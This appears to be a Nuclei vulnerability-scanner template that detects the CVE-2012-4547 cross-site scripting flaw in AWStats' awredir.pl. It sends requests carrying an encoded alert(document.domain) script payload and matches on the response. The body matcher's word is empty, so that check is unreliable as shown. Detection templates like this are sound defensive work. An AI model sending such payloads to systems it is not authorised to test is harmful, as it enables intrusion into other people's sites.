id: CVE-2012-4547 info: name: AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting author: dhiyaneshDk severity: medium description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. reference: - https://www.exploit-db.com/exploits/36164 - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 - http://awstats.sourceforge.net/docs/awstats_changelog.txt - http://openwall.com/lists/oss-security/2012/10/29/7 classification: cve-id: CVE-2012-4547 tags: cve,cve2012,xss,awstats,edb requests: - method: GET path: - '{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - "text/html" - type: status status: - 200 # Enhanced by mp on 2022/02/21